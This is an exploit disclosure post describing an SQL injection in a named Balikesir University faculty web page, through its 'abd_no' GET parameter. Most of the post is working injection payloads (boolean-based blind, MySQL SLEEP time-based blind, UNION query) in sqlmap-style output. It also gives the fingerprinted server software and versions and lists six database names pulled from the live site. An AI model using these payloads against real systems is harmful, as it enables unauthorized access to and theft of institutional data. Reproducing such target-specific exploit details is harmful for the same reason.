# Exploit Title: Balikesir Üniversitesi SQL İnjection
# Date: 22.01.2020
# Exploit Author: Furkan Özer
# Vendor Homepage: http://www.nef.balikesir.edu.tr

Link##: http://www.nef.balikesir.edu.tr/dtsyaz/sorgula_abd_ders_dagilimi.php?abd_no=[] SQL'li


Parameter: abd_no (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: abd_no=-2068 OR 4490=4490

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: abd_no=9 AND (SELECT 3573 FROM (SELECT(SLEEP(5)))XDzC)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: abd_no=-5007 UNION ALL SELECT NULL,CONCAT(0x7178627671,0x667643597a76566c4e444f426b524a56486d6862575547786b6174546e794d6273516254774e6853,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- YYWZ

the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.4.35, PHP 5.6.38, PHP
back-end DBMS: MySQL >= 5.0.12

available databases [6]:
[*] information_schema
[*] nefveri
[*] nefveri_bahar
[*] nefveri_guz
[*] nefveri_yedek
[*] test